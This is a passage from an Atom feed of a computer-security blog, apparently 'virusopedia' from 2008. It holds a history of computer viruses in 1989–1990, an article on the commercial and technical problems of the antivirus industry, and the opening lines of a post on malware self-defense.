which led to the destruction of the file allocation tables (FAT) and irrevocable loss of data.&lt;br /&gt;&lt;br /&gt;The first warning about the virus came out of the Netherlands in March from Fred Vogel. Despite the relatively low infection rate, Datacrime evoked a hysterical reaction worldwide. The repeated warnings resulted in significantly distorted descriptions of how the virus really worked and what damage it caused.
In the US, the virus was named Columbus Day because many speculated that the virus had been written by Norwegian terrorists attempting to punish Americans for crediting Columbus instead of Eric the Red with the discovery of America.&lt;br /&gt;&lt;br /&gt;An interesting incident occurred in Holland. The local police decided to begin a proactive fight against cyber-crime. They developed an antivirus program capable of neutralizing Datacrime and sold it directly to local precincts for a mere $1. There was tremendous demand for the antivirus program, but it was soon discovered that the program was unreliable and had a high false positive rate. A second version was produced to correct the mistakes; however, it was also riddled with bugs.&lt;br /&gt;&lt;br /&gt;October 16th, 1989 saw the appearance of the WANK worm on VAX/VMS computers on the SPAN network. The worm spread via the DECNet protocol and changed system messages to read 'WORMS AGAINST NUCLEAR KILLERS', accompanied by the message 'Your System Has Been Officially WANKed.' WANK also changed system passwords to random symbols and sent them to a user by the name of GEMPAK on the SPAN network.&lt;br /&gt;&lt;br /&gt;December 1989 witnessed the Aids Information Diskette incident. 20,000 disks containing a Trojan were sent to addresses in Europe, Africa, Australia and the WHO. The addresses had been stolen from the database of PC Business World. Once an infected disk had been loaded, the program would automatically install itself on the system, creating its own concealed files and directories and modifying system files. After 90 loads, the program encoded the names of all files, rendering them invisible and leaving only one file accessible. This file recommended paying money to a specified bank account. As a result, it was relatively easy to identify the Trojan's author as one Joseph Popp, who had earlier been declared insane.
Despite this, he was convicted in absentia by Italian authorities.&lt;br /&gt;&lt;br /&gt;It is interesting to note that 1989 marked the beginning of virus epidemics in Russia as well. Towards the end of 1989, approximately 10 viruses (listed in the order they arrived) appeared in Russian cyber-space: 2 versions of Cascade, several modifications of Vacsina and Yankee, Jerusalem, Vienna, Eddie, and PingPong.&lt;br /&gt;&lt;br /&gt;The spread of high technology worldwide predetermined the appearance of new antivirus projects throughout the world, just as it did in Russia, or the USSR as it was at that time. In 1989, antivirus expert Eugene Kaspersky, who would later found Kaspersky Lab, first ran into a virus: his work computer was infected by Cascade in October 1989. It was this incident that led Eugene to devote his life to antivirus research.&lt;br /&gt;&lt;br /&gt;Only a month later, Eugene detected the Vacsina virus using the first version of the -V antivirus program he had just written. Years later, -V turned into AVP Antiviral Toolkit Pro.&lt;br /&gt;&lt;br /&gt;In fact, 1989 saw a bumper crop of antivirus companies: F-Prot, ThunderBYTE, and Norman Virus Control.&lt;br /&gt;&lt;br /&gt;So many people became so nervous about viruses that various groups and individuals asked IBM, then the undisputed leader in the IT market, to provide an antivirus solution. IBM in turn decided to commercialize the internal antivirus project they were running. IBM Virscan for MS-DOS went on sale in October 1989.&lt;br /&gt;&lt;br /&gt;After brief consideration and market research, IBM had decided to 'declassify' the antivirus project developed in its TJ Watson Research Center and turn it into a full commercial product; it was sold for only $35.&lt;br /&gt;&lt;br /&gt;April of 1989 marked another landmark in the antivirus field: the first antivirus publications were founded.
UK-based Sophos sponsored Virus Bulletin, whereas Dr. Solomon's founded Virus Fax International. Virus Bulletin exists to this day, while Virus Fax International was first renamed Virus News International and eventually metamorphosed into Secure Computing.&lt;br /&gt;&lt;br /&gt;Today, Secure Computing is considered one of the most popular sources in information technology security and specializes not only in antivirus programs but also in computer and device safety. Secure Computing conducts annual contests under the 'Secure Computing Awards' title for the best developments in various fields, including antivirus safety, cryptology, access control, intranet screens, and others.&lt;br /&gt;&lt;br /&gt;1990&lt;br /&gt;1990 saw several important developments in virus writing. Virus writers developed new features and established well-publicized communities to share information.&lt;br /&gt;&lt;br /&gt;To start with, the first polymorphic viruses appeared in 1990: the Chameleon family (1260, V2P1, V2P2, and V2P6), which evolved from two earlier well-known viruses, Vienna and Cascade. Chameleon's author, Mark Washburn, used Burger's book on the Vienna virus and then added features from the self-encoding Cascade virus. Unlike Cascade, Chameleon was not only encrypted, but the virus code also changed with every infection. This particular feature rendered contemporary antivirus programs useless. Up to that point, antivirus programs had depended on an ordinary context search for pieces of known virus code. Chameleon did not have permanent code, which made the development of new types of antivirus programs priority number one. These developments were not long in coming. Soon thereafter, antivirus experts invented special algorithms to identify polymorphic viruses. Later, in 1992, Eugene Kaspersky developed an even more effective method for neutralizing polymorphic viruses: a processor emulator for decrypting the virus code.
Today, this technology is an integral attribute of all antivirus programs.&lt;br /&gt;&lt;br /&gt;The second important milestone was the appearance of the Bulgarian Virus Producing Factory. Throughout this year and for a number of years afterwards, a large number of viruses of Bulgarian origin were detected in the wild. They included entire virus families such as Murphy, Nomenclatura, Beast (or 512 or Number of Beast), new modifications of Eddie, and many more.&lt;br /&gt;&lt;br /&gt;A virus writer named Dark Avenger was particularly active: he released several viruses a year, which incorporated new infection and concealment techniques. It was Dark Avenger who first employed a technique where the virus, when detected, would automatically infect all files in the computer, even if the file was opened for read-only purposes. Dark Avenger demonstrated exceptional ability, not only in creating viruses, but in spreading them as well. He actively loaded infected programs onto BBSs, distributed source codes for his viruses, and advocated the creation of new viruses in every way possible.&lt;br /&gt;&lt;br /&gt;The first BBS (VX BBS) aiming to provide an open forum for the exchange of viruses and information for virus writers was established in Bulgaria, probably by Dark Avenger. The philosophy behind the board was simple: if a user uploaded a virus, then in exchange he was allowed to download one from the board's catalog. If the user submitted a new and interesting virus, then he was granted full access to the board's resources and could download an unlimited quantity of viruses from the collection. It almost goes without saying what a powerful effect VX BBS had on the development of viruses, especially since the board was open to the whole world, not just Bulgaria.&lt;br /&gt;&lt;br /&gt;In July of 1990, a serious incident occurred with the English computer magazine PC Today. 
Each issue of the magazine contained a free floppy disc which turned out to be infected with a copy of DiskKiller. More than 50,000 copies of the magazine were sold. The resulting epidemic made virology history!&lt;br /&gt;&lt;br /&gt;Two innovative stealth viruses appeared in the second half of 1990: Frodo and Whale. Both used an incredibly complex algorithm to conceal themselves in the system. The nine kilobyte Whale, in addition, employed several levels of encryption and a whole array of tricky anti-debugging techniques.&lt;br /&gt;&lt;br /&gt;The first Russian viruses appeared: Peterburg, Voronezh, and LoveChild.&lt;br /&gt;&lt;br /&gt;In December of 1990, EICAR (European Institute for Computer Antivirus Research) was established in Hamburg, Germany. The institute is still considered one of the most respected international organizations, uniting professionals from practically all major antivirus companies.</content><link rel='replies' type='application/atom+xml' href='http://virusopedia.blogspot.com/feeds/3605309670277165105/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=2383994250717691599&amp;postID=3605309670277165105' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/3605309670277165105'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/3605309670277165105'/><link rel='alternate' type='text/html' href='http://virusopedia.blogspot.com/2008/06/malicious-de-history.html' title='Malicious De History'/><author><name>PROF. 
SJAFW</name><uri>http://www.blogger.com/profile/00700919093101522027</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='18053836773761000586'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2383994250717691599.post-1185378648825859134</id><published>2008-06-07T09:44:00.000-07:00</published><updated>2008-06-07T09:45:45.296-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virusopedia'/><category scheme='http://www.blogger.com/atom/ns#' term='mmm'/><category scheme='http://www.blogger.com/atom/ns#' term='mentality'/><category scheme='http://www.blogger.com/atom/ns#' term='ctfmon.exe'/><category scheme='http://www.blogger.com/atom/ns#' term='industry'/><category scheme='http://www.blogger.com/atom/ns#' term='viruses'/><category scheme='http://www.blogger.com/atom/ns#' term='malicious'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><category scheme='http://www.blogger.com/atom/ns#' term='encyclopedia'/><title type='text'>Virus Industry and Challenges</title><content type='html'>The Internet today is a breeding ground for criminal activity. Home users, small and medium businesses, international corporations and governmental bodies all suffer from constant attacks by viruses and Trojans. The reasons why the Internet is in this condition have been widely discussed, and will continue to be discussed. But what do I mean when I say that the Internet is a fertile environment for crime? 
At bottom, it means that money is being made illegally by creating and distributing malicious programs, which will:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;steal personal and corporate bank account information &lt;br /&gt;steal credit card numbers &lt;br /&gt;conduct DDoS attacks, with the instigators then demanding money to stop the attacks (a cyber racket) &lt;br /&gt;create networks of Trojan proxy servers. These can be used to send spam, and for commercial gain &lt;br /&gt;create zombie networks, which can be exploited in multiple ways &lt;br /&gt;create programs which download and install adware to the victim machine &lt;br /&gt;install Trojan dialers which will repeatedly call pay services &lt;br /&gt;etc. &lt;br /&gt;&lt;br /&gt;It's difficult to say exactly how widespread criminal activity is. I think that there are dozens, if not hundreds of hacker groups and individual hackers active in the computer underground. The hackers who belong to groups can probably be numbered in the thousands - this is according to the law enforcement agencies of most computerized countries. Over the last few years several dozen hackers and hacker groups have been arrested, and the total number of arrests topped several hundred. However, this doesn't seem to have had any real effect on the number of viruses and Trojans.&lt;br /&gt;&lt;br /&gt;Another figure which can only be guessed at is the total turnover of the computer underground. Published sources estimate that between 2004 and 2005 hackers either stole or scammed several hundred million dollars. As the vast majority of cyber criminals have not been arrested or imprisoned, we can assume that the annual turnover is probably billions of dollars. (This figure may well exceed the annual turnover of antivirus companies - for these figures, see below.)&lt;br /&gt;&lt;br /&gt;The total damage done to the world economy by the activity of virus writers, hackers and spammers has long since exceeded tens of billions of dollars annually. 
The amount continues to grow. According to research carried out by Computer Economics, total losses in 2004 were close to $18 billion, with a trend towards a 30 - 40% annual growth rate.&lt;br /&gt;&lt;br /&gt;Let's take a look at the players in the world of cyber threats:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Virus writers and hackers are creating and distributing viruses and Trojans for their own reasons &lt;br /&gt;End users' machines and networks are under constant threat of hacker attacks, and may often fall victim to co-ordinated attacks &lt;br /&gt;Police and law enforcement bodies throughout the world are only partially successful in investigating and prosecuting cyber crimes &lt;br /&gt;Antivirus companies create software to counteract cyber threats &lt;br /&gt;&lt;br /&gt;There's been a great deal written about viruses, hackers, and those who hunt them down - there have even been Hollywood films made on the subject. The developers and vendors of antivirus solutions use their web sites to publicize their achievements. However, there isn't much information about the problems which the antivirus industry faces. This article, therefore, aims to address this topic and, to some extent, rectify the imbalance.&lt;br /&gt;&lt;br /&gt;A short overview of the antivirus industry&lt;br /&gt;To start with, let's take a look at the companies manufacturing standard solutions which protect against computer viruses. (We'll discuss dedicated solutions and tools a little later in the article.) By standard solutions, I mean software for desktops, file servers, mail servers, and the perimeter of corporate networks.&lt;br /&gt;&lt;br /&gt;The total market for such standard solutions was estimated as being $2.7 billion in 2003 and $3.3 billion in 2004, with $3.8 billion being the predicted figure for 2005. (All information in this section is taken from IDC, 2005). 
All antivirus manufacturers are divided into three groups: industry leaders, second tier companies, and others (those which have no significant effect - if any - on the antivirus landscape).&lt;br /&gt;&lt;br /&gt;The leaders include Symantec, McAfee (NAI) and Trend Micro - the activity of these companies affects all markets:&lt;br /&gt;&lt;br /&gt;&lt;table&gt;&lt;tr&gt;&lt;th&gt;Company&lt;/th&gt;&lt;th&gt;Annual turnover 2003, $mln&lt;/th&gt;&lt;th&gt;Annual turnover 2004, $mln&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Symantec&lt;/td&gt;&lt;td&gt;1098&lt;/td&gt;&lt;td&gt;1364&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;McAfee (NAI)&lt;/td&gt;&lt;td&gt;577&lt;/td&gt;&lt;td&gt;597&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Trend Micro&lt;/td&gt;&lt;td&gt;382&lt;/td&gt;&lt;td&gt;508&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;These three companies occupy leading positions in all markets, with a few exceptions (for instance, Trend Micro dominates the Japanese market). Symantec and NAI (McAfee) are North American. Trend Micro is originally a Taiwanese company which was floated on the Japanese stock market. It is currently headquartered in the USA.&lt;br /&gt;&lt;br /&gt;The second tier includes companies whose turnover is significantly lower than the leading three. However, these companies still have an annual turnover of tens of millions of dollars:&lt;br /&gt;&lt;br /&gt;&lt;table&gt;&lt;tr&gt;&lt;th&gt;Company&lt;/th&gt;&lt;th&gt;Annual turnover 2003, $mln&lt;/th&gt;&lt;th&gt;Annual turnover 2004, $mln&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Sophos (UK)&lt;/td&gt;&lt;td&gt;97&lt;/td&gt;&lt;td&gt;116&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Panda Software (Spain) *&lt;/td&gt;&lt;td&gt;65&lt;/td&gt;&lt;td&gt;104&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Computer Associates (USA)&lt;/td&gt;&lt;td&gt;61&lt;/td&gt;&lt;td&gt;74&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;F-Secure (Finland)&lt;/td&gt;&lt;td&gt;36&lt;/td&gt;&lt;td&gt;51&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Norman (Norway)&lt;/td&gt;&lt;td&gt;23&lt;/td&gt;&lt;td&gt;31&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;AhnLab (S.Korea)&lt;/td&gt;&lt;td&gt;21&lt;/td&gt;&lt;td&gt;28&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;* Panda Software is a private company. Financial information given is unaudited.&lt;br /&gt;&lt;br /&gt;Kaspersky Lab, based in Russia, is also included in this group. However, the company does not disclose financial information.&lt;br /&gt;&lt;br /&gt;The majority of second tier companies have a significant presence in their respective domestic markets, but a relatively small presence in foreign markets. 
For instance, Sophos is most successful in the UK, Panda in Spain, F-Secure in Scandinavian countries etc.&lt;br /&gt;&lt;br /&gt;The third group includes several dozen antivirus companies. The best known include:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Alwil - Avast (the Czech Republic) &lt;br /&gt;Arcabit - MKS (Poland) &lt;br /&gt;Doctor Web - DrWeb (Russia) &lt;br /&gt;ESET - NOD32 (Slovakia) &lt;br /&gt;Frisk Software - F-Prot (Iceland) &lt;br /&gt;GriSoft - AVG (the Czech Republic) &lt;br /&gt;H+BEDV - AntiVir (Germany) &lt;br /&gt;Hauri - VI Robot (South Korea) &lt;br /&gt;SoftWin - BitDefender (Romania) &lt;br /&gt;VirusBuster - VirusBuster (Hungary) &lt;br /&gt;The third group also includes UNA and Stop! (both Ukrainian), Rising and KingSoft (China) and others.&lt;br /&gt;&lt;br /&gt;The majority of companies in this group do not disclose any financial information. However, some estimates state that annual turnover is around $10 million.&lt;br /&gt;&lt;br /&gt;The information above gives a breakdown of antivirus companies' market share. However, companies offering products based on licensed technologies aren't included. Examples are the German company G-Data, whose antivirus solution is based on Kaspersky Lab and SoftWin technologies, and Microsoft, which offers a multi-engine solution developed by Sybari.&lt;br /&gt;&lt;br /&gt;There are also some non-standard types of antivirus protection, some of which are relatively specialized. This includes systems which will delete any potential threat from corporate email messages (the end user receives only messages without executable attachments or html scripts), systems which will launch the web browser within a virtual machine etc. There are also some programs which are fairly similar to antivirus solutions: software which protects against DDoS attacks, patch management software etc. 
However, none of these can be called fully functional antivirus products.&lt;br /&gt;&lt;br /&gt;Problems of the antivirus industry&lt;br /&gt;What problems might the antivirus industry be facing, apart from the market headaches which plague any manufacturer of consumer goods? We all know that viruses exist, and so do antivirus solutions. It might seem that antivirus solutions are a standard consumer product - one solution barely differs from the next. Users choose their product according to design, or marketing, or for some other non-technical reason. Given this, an antivirus solution is, in theory, just another consumer product, like washing powder, toothpaste, or cars.&lt;br /&gt;&lt;br /&gt;Unfortunately (or perhaps fortunately) this is not the case. Users often choose an antivirus solution for its technical characteristics, and these differ widely between products. Users often focus on whether or not a specific product protects against a specific type of cyber threat, and the overall level of protection offered.&lt;br /&gt;&lt;br /&gt;An antivirus solution should be able to protect against ALL types of malicious program. The better the antivirus solution, the happier users and system administrators will be. Anyone who doesn't understand this in theory will very soon be faced with the practical consequences; without a good antivirus solution, someone can start stealing money from the user's bank account, or the computer may start dialing phone numbers of its own accord, leaving the user to wonder why outgoing traffic has increased so much. Given this, users should have some idea of what protection is offered by antivirus solutions, so that an informed choice can be made.&lt;br /&gt;&lt;br /&gt;Let's say that antivirus solution X detects 50% of all viruses currently circulating on the Internet; product Y detects 90%, and product Z, 99.9%. 
Each of N attacks will result in either the computer's integrity being maintained or the system becoming infected. If the computer is attacked 10 times, then the likelihood of product X failing to detect a malicious program is virtually guaranteed; product Y is more than likely to fail to detect the culprit; and in the case of product Z, the danger is almost infinitesimal. &lt;br /&gt;&lt;br /&gt;Unfortunately, there are relatively few products available in shops or on the Internet which offer even close to 100% protection. The majority of products are unable even to guarantee 90% protection. And this is the main problem facing the antivirus industry today.&lt;br /&gt;&lt;br /&gt;Problem #1&lt;br /&gt;The number and variety of malicious programs is increasing year on year. The result is that many antivirus companies are simply unable to cope with the onslaught and are losing this 'virus arms race'. Users who choose products manufactured by such companies will not be protected against all malicious programs. Unfortunately, this may be a large number of users, as a lot of products marketed as 'antivirus solutions' shouldn't really be called this at all.&lt;br /&gt;&lt;br /&gt;Incidentally, five or ten years ago, it could honestly be said that an antivirus solution didn't need to protect systems against every new virus and Trojan. After all, the majority of new malicious programs which were appearing at this time would never penetrate the user's computer. They were written by adolescent cyber vandals, who either wanted to show off their coding skills, or to satisfy their curiosity. Users only really needed protection against the few In The Wild viruses which managed to actually penetrate victim machines. However, the situation has now changed. More than 75% of malicious programs - i.e. the overwhelming majority - are created by the criminal computer underground, with the aim of infecting a defined number of computers on the Internet. 
The number of new viruses and Trojans is now increasing every day by a few hundred - the Kaspersky Virus Lab receives between 200 and 300 new samples a day.&lt;br /&gt;&lt;br /&gt;These samples come from several sources - honeypots (dedicated machines used to collect malicious files on the Internet); users of infected machines; local network administrators; ISPs; and from other antivirus companies, strange though this may sound. In spite of market segmentation of antivirus companies (which happens with any market, without exception), antivirus companies do work with each other. If a new worm which propagates quickly is detected by one antivirus company, the analysts will inform competitor companies almost immediately, and forward a sample of the worm. And the majority of antivirus companies exchange virus samples at least once a month. They also exchange information at dedicated professional gatherings, which are not open to those outside the industry. It could be seen as professional ethics; antivirus companies do share information with other antivirus companies, except for those companies which may have damaged their standing in the antivirus world through unethical behaviour.&lt;br /&gt;&lt;br /&gt;Let's suppose that a new virus or Trojan is detected in the wild, either on the Internet or on an infected computer. What does this mean? It means that the likelihood that a certain computer will be infected by a parasite is far from zero, and it's possible that dozens, hundreds or maybe even thousands of the computers which make up the Internet are already infected. And given how quickly the Internet works, if the latest 'beastie' is a network worm, then the number of victims could be in the millions. Consequently, antivirus companies have to be able to release rapid updates to antivirus databases, and these updates have to include protection against all the newest viruses and Trojans. 
This brings us on to the second problem faced by the antivirus industry.&lt;br /&gt;&lt;br /&gt;Problem #2&lt;br /&gt;Today, malicious programs propagate so quickly that antivirus companies have to release updates as quickly as possible to minimize the amount of time that users will potentially be at risk. Unfortunately, many antivirus companies are unable to do this - users often receive updates once they are already infected.&lt;br /&gt;&lt;br /&gt;Let's assume that the virus manages to penetrate the victim machine, and the antivirus solution installed on the victim machine doesn't detect any suspicious activity. (This might be because of the quality of the solution itself, or because the user has been careless, and not downloaded the latest updates to the antivirus databases in good time.) Sooner or later, updates which detect the virus will be released - this means that the virus will be detected, but not necessarily defeated. To get rid of the virus once and for all, the infected files have to be carefully deleted from the victim machine. “Carefully” is the key word here, which brings us to the third problem connected with antivirus programs. &lt;br /&gt;&lt;br /&gt;Problem #3&lt;br /&gt;The third problem faced by the antivirus industry is deleting malicious code detected on the victim machine. Very often viruses and Trojans are written in a way which enables them to hide their presence in the system and/or to penetrate the system so deeply that deleting them is a complex task. Unfortunately, some antivirus programs are unable to delete malicious code and restore the data which has been modified by the virus without causing further problems. &lt;br /&gt;&lt;br /&gt;An additional issue is that all software uses system resources, and antivirus programs are no exception. In order to protect the computer, the antivirus program has to perform certain actions - open files, read information in them, open archives to scan them, and so on. 
The more thoroughly a file is checked, the more resources are required by the antivirus solution. In this way, an antivirus solution is similar to a security door - the thicker the door is, the more protection it will offer; however, the heavier the door is, the more difficult opening and closing it will be. When talking about antivirus solutions, the problem is balancing program speed against the level of protection provided.&lt;br /&gt;&lt;br /&gt;Problem #4&lt;br /&gt;Unfortunately, the issue of resource usage is almost insoluble. Experience shows that antivirus solutions which offer rapid scanning are heavily flawed, and will let viruses and Trojans through like water through a sieve. However, the opposite is also not true; antivirus programs which run slowly do not necessarily offer effective protection.&lt;br /&gt;&lt;br /&gt;In order to scan files on the fly and provide constant protection for the computer, an antivirus solution has to penetrate relatively deeply into the kernel of the system. It will always penetrate the same levels. Technically speaking, an antivirus program has to install interceptors of system events deep inside the protected system and transmit the results to the antivirus engine in order that intercepted files, network packets and other potentially dangerous objects can be scanned.&lt;br /&gt;&lt;br /&gt;However, sometimes it's simply not possible to install two interceptors at the necessary kernel level of the operating system. The result is incompatibility between the antivirus monitors (which function constantly), as the second antivirus will either be unable to intercept system events, or the attempt to duplicate the interception mechanism can lead to a system crash. 
And this is at the heart of the next problem of the antivirus industry.&lt;br /&gt;&lt;br /&gt;Problem #5&lt;br /&gt;Incompatibility between antivirus programs is an issue; in the vast majority of cases, installing two antivirus programs from different vendors on one machine (for increased protection) is technically impossible, as the two programs will disrupt each other's functioning.&lt;br /&gt;&lt;br /&gt;People often think that antivirus companies are acting like toddlers snatching at each other's toys, that the incompatibility issue is caused by unfair competition, and specially designed in order to squeeze other manufacturers out of the market. However, this is not the case. There is no question of unfair or unethical competition. On the contrary, developers make every effort they can to ensure that their product does not conflict with other popular software (including antivirus solutions).&lt;br /&gt;&lt;br /&gt;Above, I've tried to summarize what I think are the fundamental issues facing today's antivirus industry. So how is the industry going to address these issues? What type of protection will antivirus companies offer in the future?&lt;br /&gt;&lt;br /&gt;New technologies vs. traditional solutions&lt;br /&gt;Naturally enough, from time to time antivirus developers want to invent quintessentially new technologies, which will solve the problems listed above at a single stroke, a kind of universal panacea. This proactive protection would make it possible to detect a virus and delete it prior to the virus actually being created and appearing on the Internet - and this could be applied to all emerging virus threats.&lt;br /&gt;&lt;br /&gt;Unfortunately, this simply isn't possible. A 'universal' solution is only effective against those threats which act in accordance with constant, well defined rules. As computer viruses aren't a natural occurrence, but the creation of the intricate workings of hackers' minds, they are not subject to any fixed rules. 
Rather, viruses abide by a set of rules which will constantly change in accordance with the goals of the computer underground. &lt;br /&gt;&lt;br /&gt;Let's take the example of the behaviour blocker, which is a competitor to traditional antivirus solutions based on virus signatures. These are two completely different approaches to scanning for viruses, which are not necessarily mutually exclusive. A signature is a small piece of code which can be compared to files, and the antivirus solution checks to see if the two are identical. A behaviour blocker, on the other hand, tracks application behaviour on launch, and will terminate programs if suspicious or known malicious behaviour is detected. Both methods have their advantages and disadvantages.&lt;br /&gt;&lt;br /&gt;One benefit of a signature scanner is that it detects all malicious code that it recognizes. The minus is that it will fail to detect malicious code which it hasn't encountered before. Another potential minus is the large size of antivirus databases and the resources they consume. Behaviour blockers offer benefits in that they are able to detect even unknown malicious programs. On the minus side is the possibility of false positives; the behaviour of today's viruses and Trojans is so diverse that devising a single set of rules which encompasses all possible behaviours is simply impossible. This means that the behaviour blocker is certain to fail to detect some malicious programs, and will periodically prevent legitimate applications from functioning.&lt;br /&gt;&lt;br /&gt;Behaviour blockers have another inherent disadvantage; they are unable to combat conceptually new malicious programs. Let's imagine that Company X has developed a behavioural antivirus AVX, which detects 100% of current malicious programs. So what will the hackers do? Of course, they will invent new types of malicious programs. And then of course it will be necessary to update the behavioural rules. 
And then update them again, because the hackers and virus writers aren't going to give up that easily. And then update them again and again and again. At the end of the day, we arrive at a signature scanner, except the signatures will be behavioural, and not pieces of code. &lt;br /&gt;&lt;br /&gt;This conclusion also applies to the heuristic analyser, another proactive protection method. As soon as hackers perceive that antivirus technologies are preventing them from reaching their victims, they invent new virus technologies which will be used to evade proactive detection. As soon as a product with advanced heuristics and/or behaviour blocking is widely used, the 'advanced' technologies employed will cease working.&lt;br /&gt;&lt;br /&gt;This means that 'reinvented' proactive technologies are only effective for a relatively short length of time. Where junior hackers need a few weeks or a couple of months to get round proactive protection, professional hackers will need one or two days, or, in the worst case, a few minutes or hours. This means that behaviour blockers or heuristic analyzers, however effective they may be, need constant development and updating. It should also be noted that adding new signatures to antivirus databases is a matter of a few minutes, whereas perfecting and testing proactive protection methods takes much longer. The result is that in many cases signature updates to antivirus databases are far better than the average proactive protection solution. The experience of epidemics caused by new email and network worms, new spy programs and other types of malicious code bears this theory out.&lt;br /&gt;&lt;br /&gt;Of course this doesn't mean that proactive protection is useless. 
It functions well within specific boundaries, and is capable of stopping a certain amount of malware (the programs created by less experienced hackers and virus writers). For this reason, proactive protection can be a useful addition to signature scanners, but it should not be relied upon to provide total protection.&lt;br /&gt;&lt;br /&gt;Comparative testing and its weaknesses&lt;br /&gt;This part of the article looks at the problems users may have when choosing an antivirus solution. It's assumed that the user will be looking for a product which offers real protection against malicious code. So where can they get information to base their decision on?&lt;br /&gt;&lt;br /&gt;The most logical thing is naturally to look at comparative test results from different sources, including professional ones. Do such things exist? Yes, they do, but there aren't many of them. Most IT publications conduct comparative tests of antivirus solutions on a fairly regular basis. They test the solutions thoroughly, and compare everything from the product price to the quality of technical support provided. However, these tests don't really prove the quality of the antivirus function. This is understandable, as testers would need a fairly large virus collection, their own test stands, and automated testing procedures to test the antivirus component thoroughly. This means a dedicated group which only tests antivirus solutions, and which requires the necessary resources - something which most IT publications don't have. 
Comparative tests conducted by IT publications therefore either leave much to be desired, or the publications contact experts who specialize in testing antivirus products.&lt;br /&gt;&lt;br /&gt;Currently, the most experienced testers of antivirus products are Andreas Marx (Germany, http://www.av-test.org) and Andreas Clementi (Austria, http://www.av-comparatives.org). These tests describe in detail the quality of detection of various types of malicious programs and the speed at which different antivirus companies react to epidemics. The tests are thorough and detailed, and can be used to compare the characteristics of the antivirus solutions themselves. Sadly, these tests only examine the two characteristics described above; they do not address issues of how antivirus solutions perform in real life situations, e.g. when curing an infected system, the reaction of the solution to infected web sites, the amount of resources used, and the thoroughness with which archives and installers are checked.&lt;br /&gt;&lt;br /&gt;Sadly, tests which provide an in-depth, accurate picture of how products react in typical situations barely exist. The one exception that we know of is the Test Lab at Moscow State University, which conducts tests using a fairly wide range of situations. However, the methodology of these tests still needs working on, and the university's test lab is not yet known to the public at large.&lt;br /&gt;&lt;br /&gt;It's also worth mentioning the tests conducted by VirusBulletin (an industry publication) - I am sure that if I didn't include this, readers would ask why the tests and the resulting VB100% award hadn't been mentioned. Sadly, these tests are far from perfect. The test standards were developed in the mid-1990s and have barely changed since then. Antivirus products are tested using a collection of files infected by ITW viruses. The award is given on the basis of the test results. 
However, the ITW collection only contains between two and three thousand files - fewer malicious programs than appear in the wild in the space of a single month. Therefore, a VB100% award doesn't necessarily mean that a product really provides protection against all types of malware. It simply means that the product copes well with VirusBulletin's ITW collection, nothing more.&lt;br /&gt;&lt;br /&gt;Conclusion&lt;br /&gt;I hope that those of you who have read this far now have a better understanding of the issues which the antivirus industry faces, and that it will help you when selecting an antivirus solution for your home computer or network. I think that a computer which is connected to the Internet is rather like sex - it can be safe, or it can be unsafe. In both cases, information is the key to survival, and can protect you from unpleasant consequences. Happy surfing!</content><link rel='replies' type='application/atom+xml' href='http://virusopedia.blogspot.com/feeds/1185378648825859134/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=2383994250717691599&amp;postID=1185378648825859134' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/1185378648825859134'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/1185378648825859134'/><link rel='alternate' type='text/html' href='http://virusopedia.blogspot.com/2008/06/virus-industry-and-chalenges.html' title='Virus Industry and Challenges'/><author><name>PROF. 
SJAFW</name><uri>http://www.blogger.com/profile/00700919093101522027</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='18053836773761000586'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2383994250717691599.post-8960919967365177888</id><published>2008-06-07T09:37:00.000-07:00</published><updated>2008-06-07T09:42:21.584-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='cyber Defense'/><category scheme='http://www.blogger.com/atom/ns#' term='online'/><category scheme='http://www.blogger.com/atom/ns#' term='KamaSutra Worm'/><category scheme='http://www.blogger.com/atom/ns#' term='internet'/><category scheme='http://www.blogger.com/atom/ns#' term='Convention'/><category scheme='http://www.blogger.com/atom/ns#' term='Computer Virus'/><category scheme='http://www.blogger.com/atom/ns#' term='Worm'/><category scheme='http://www.blogger.com/atom/ns#' term='Our Defense'/><category scheme='http://www.blogger.com/atom/ns#' term='Defense'/><title type='text'>Virus Defense and Our Defense</title><content type='html'>Malware Defensivism&lt;br /&gt;&lt;br /&gt;This article explores how malware has developed self-defense techniques and how these techniques have evolved as it has become more difficult for viruses to survive. It also provides an overview of the current situation.&lt;br /&gt;&lt;br /&gt;First we must define the meaning of the term “malware self-defense”, which is not as unequivocal as it may seem at first glance. When malware attacks antivirus programs, this is clearly a form of self defense. When malware covers its tracks, this is also in some sense a form of self defense, although less obviously so. An even less obvious form of self defense is the very evolution of malicious programs. 
